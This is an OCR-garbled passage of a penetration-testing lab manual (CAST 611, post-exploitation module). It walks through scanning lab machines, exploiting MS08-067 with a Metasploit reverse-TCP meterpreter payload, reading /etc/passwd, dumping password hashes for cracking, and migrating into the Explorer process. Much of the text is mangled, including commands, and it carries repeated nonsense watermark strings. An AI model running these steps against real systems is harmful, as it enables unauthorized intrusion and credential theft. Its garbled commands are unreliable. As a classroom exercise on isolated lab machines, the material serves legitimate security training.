CAST 611 Lab Manual Post Exploitation Module 06“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL Module 06. Post Exploitation Local Assessment In dhs exerci, once a target és exploited, what do we do nest? It is important to Jhave planed your past exphitation proves so itcan be done in a timely manner. —tsou KEY Lab Scenario Ey vauailc We wil exploit a erg, then perform addtional steps to pilfer more information. a Texyur Lab Objectives reve “The objective of this lab is to help students learn to identify vulnerabilities, link B Weboenie ‘an exploit with a vulnerability, review the exploit code, attempt w exploit a LI Werkiook review target, and finally perform additional steps to pilfer more information, ‘The tasks are as follows: Start a target machine (virtual machine} * Conduct the scancing methodology against the machine + identify vulnerabilities # Search for an exploit = Compile the exploit # Atempe to exploit the machine + Harvest information from un exploited machine = Gmb the password files, * Crick passwords + Transfer files or copy files to and from an exploited machine Lab Environment “To carryout this lab, you need: + Kali Linus = OWASP virtual machie idows 2003 virtual machine # Administrative/o0t privileges w run the tools CAST I Tab Masala 1 “vanced Poretation Testing Core © by ESOanl ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 sy“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL Module 06. Post Exploitation Lab Duration “Time: 80 Minutes —Hitask 1 Lab Tasks Perform - Nmap sean eStart the Kali virtual machine. Once the machine boots up, login with a username root to elevate privileges, andl enter a password of toor. 2. The next thing we want to do is to start our OWASP and Server 2003 virtual machines, Once it starts up, do not login to the machine. We have to discover it. 3. The first ching we want todo is to scan the range with Nmap and see what we aan find. lea terminal window, enter nmap fn Pr -v-p- -TA 192.168.100.100,231. a. Weusea fragmented scan to make the scan harder @ detect, this is noted by the “P” option, b. ‘This scan will take a while to complete as it seins all ports; this is noted by the “p-” option. ae) serene Fg Nusa CAST Tab Maal Tage 7 Tavanca Poniron Testy Cope Ty BECO ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 sy“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL Bi irasw 2 Start the OpenVAS Scanner Gras 3 Perform Scan Module 06. Post Exploitation 4, We have on more than one occasion, walked you through a aumber of methods to find the vulnerabilities, and then exploit it. Acthis point we will we our vulnerbility scanner tw sce what it finds, popukue your «rget database with the information received from the Nenap sean, and then we will c OpenVAS to scan for vulnerabilities on our machines. 5. Once thi seanner, compkted, we are ready for the next step to stat the Open VAS 6. Navigate to Applications | 2 -Vulnerability Analysis | openvas start 7. [Fall goes wall, we are now set up and ready. The next thing w do is «0 connect «© the tool via the web browser. Open an keewease! browser and enter httpsif427.0.0.1:9392. 8. When che login screen comes up, login with admin and a password of adminpw. ‘This shoull put you in the OpeiVAS interlace dashboard Grenbome Security Assistant 9. In the Quick start wizard, enter the IP address of the OWASP machine and dlick on Start Sean, ay SLL cme deat new set Inmaay sans adore Birask 4 Set Up a TFTP Server Figne| 2 OpenVASinkrce dstvad rnre Scty festart 10. By camining the scan ouput, you will come to know that most of the vulnerabilities are at a High rating, 11. Our intent here is for post exploittion, so we will gt the exploit now. We alreuly know we have the TikiWiki exploit to work with, so we will work with that one first. 12, The next thing we want t do is set upa ‘TFTP server on our Kali machine. We like © use TFTP since it is lightweight and many of our compromised machines will more than likely have a client ayaihble, ‘There are a number of FTP servers you can instill, we will use the atlipd server, Ip. terminal window, entcrapeget install atftpd, 13, This will download ard install the dtp package CAST GI Tab Masa Tage “vanced Ponctation Tesing Conve © by EES ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 sy“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL Giras« 5 Bind the TFTP Server Birask 6 Pull the Module 06. Post Exploitation 14, We want to bind the TFIP server to our IP address of the Kali virtual machine, This will allow us to set up a TETP server that we can transfer files back and forth, 15, Einter atftpd daemon -port 69 —bind-address 192.168.100.200 tmp. \ sample of the output of this command can be found in Figure 1-3. le Edt View Searcn Terminal Help Fg tp stay 16. To verify the server started, enter netstat -anu | grep 69. This will present the ‘output similar to what is shown in Figure 1-4 Fe LATED sors 17. We now have a tftp server setup; this will handle virtually all of our required file transfers that we will need. We will now use the servers for our exploration into post exploitation. ‘The first thing we want to do is to pull the password file from the exploited machine, In. your shal from the target machine, enter cat etc/passwd. Note: This is a shell that we created in. Module 05 by explo machine. (Refer Module 05: Expbitation, Lab - 04, Figure 4-9). ing the target 18, Professional security testing, and especially exploitation is a process. Next, we are continuing on the panned step-by-step progression. We have access to the compromised machine, and how far we carry out the post exploitation depends on the amount of time we have and the scope of work within our assignment. This is the process, and it takes ime and resources, and sometimes it does fail. Your job as a professional tester is to write it up and produce the information in the delivery report. 19, Ok, wespent some time on the Linux machine, we will now shift our focus to the Windows machine. CAST OI Tah Masa Tage THT ‘vanced Penetration Testing Coparshr Ty B-COunell ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 syModule 06. Post Exploitation 21) Mor the Windows machine we will use the Metaspbit tool, because it has an TASK 7 advanced shell that we can use to perform a umber of local enumeration Start the steps. Start the Metasploit tool by entering, following in a terminal window. Metasploit Too! 1. service postgresql start b. _msfconsole Reena reine) Ieee gen ans Secs eee 7 “Trrasx se 21 Ifyou wanttostep through the methodology you can, but for the sake of time Exploit the wwe will exploit the MS-08.67 server service vulnerability. This is one of our ‘Target Machine most relizble exploits, so itis excelent ro use when you are trying for 100% exploitation success. Inthe Metasphit tool, enter use exploitwindows/smb/ms08 067 netapi We nest want to set the payload, since we want an advanced shell, we will use the meterpreter shall Enter set PAYLOAD windowsimoterpreter/reverse tcp. 25, We next want to enter the target, we can use the default target selection oF we can use the actual CAST GI Tab Masala ‘vanced Penetration Testing Coparshr Ty B-COunell AL Rights Reserved, Rec tion Sri FebModule 06. Post Exploitation 24, ‘The next thing, we do is set up the local host, so we enter set LHOST 192.168.100.200. 25. Now to set up the target machine, so we enter set RHOST 192.168.100.100, 26. We are now ready to try and exphoit the machine, so enter exploit 4. If all goes well, you should see something similar to that being shown in Figure 1-6. errrear rte? Figrel GFaphit wih nctpter “Trask a 28 Since we now have 2 meterpeter shall, we bave a lot of advanced things we Crack the can do, enter kashdump. This will dump the password hashes for the Password machine, all we have to do is to copy them and then save it to a file. An ‘exampk of this is shown in Figure 1-7 Serer Fg Sets towing pwede 29, We could now save the data and then import it into john the ripper and attempt to crack passwords, ‘CAST GATT Mal Tage TF Tavanca Poniron Testy Cope Ty BECO ATR: Reserved Reproduction & Sei Probie“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL DirasK 10 Collect Additional Information Module 06. Post Exploitation 30. As you can see, the meterpreter shell has many advanced features. We will look at one more, and it is highly recommended that you explore this powwerful shell more on your own. 31, The next feature we will look at is the migrate feature. This allows us to migrate a process from the exploited one to another one. We often like to migrate to the Explorer process, because most users are not going to kill their ‘own desktop. When we exploit something there is a chance that the exploit will crash a process, so we can prevent Ising the exploit by migrating the code to another process. In your meterpreter shall, enter ps.’ This will display rocesses currently running on the target machine, a shown in Figure 1-8, Fog 14:7 coment pat 32. You can migrate to any process that you want, [ recommend that you migrate to the explorer process, and you do this by entering the command migrate . 35. An example of a migrated process command is shown in Figure 1-9. Figrel-2 Seenha swiss gain CAST GI Tab Maal Tage TI ‘vanced Penetration Testing Coparshr Ty B-COunell ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 syModule 06. Post Exploitation 34. An important thing to remember is that no matter what OS you compromise you will have command level access, and more importantly local machine access. So your normal local techniques will be very effective, things to look for: 1. Open Ports b. Routing, c. Services 35, We ean also access a normal shell from the Metespreter shell, « do this enter the command shell Note: Manually Incate the path and type dir to list directory contents, ras Tas Seas aU aoa cat Fig 10: expel sin ices CAST GI Tab Masa Tage ‘vanced Penetration Testing Coparshr Ty B-COunell AL Rights Reserved, Rec tion Sri Feb“ejequieus ueyrued ynyny Jo Ado> jeuosied es SL Module 06. Post Exploitation 36, We could also background the session and exploit it apzis reason we like to find this vulnerability this is another 31. This concludes the exercise, close all windows, and suspend or shut down the virtual machines and dean up from the exercise. Lab Analysis After exploiting a machine, it is important that you plin for post exploitation activites, this involves a number of steps PLEASE TALK TO YOUR INSTRU RELATE! TOR IF YOU HAVE QUESTIONS D TO THIS LAB. eRe aB Se seed OYes No Platform Supported (Classroom Bilabs ab Mal gc 1 ‘RlvanasT Poctaton Feng Cori © Ty SS ATR: Reserved Reprochrion & Seely Poli *ejoquieus ueynued anyny Jo Ado> jeuosied © 51 sy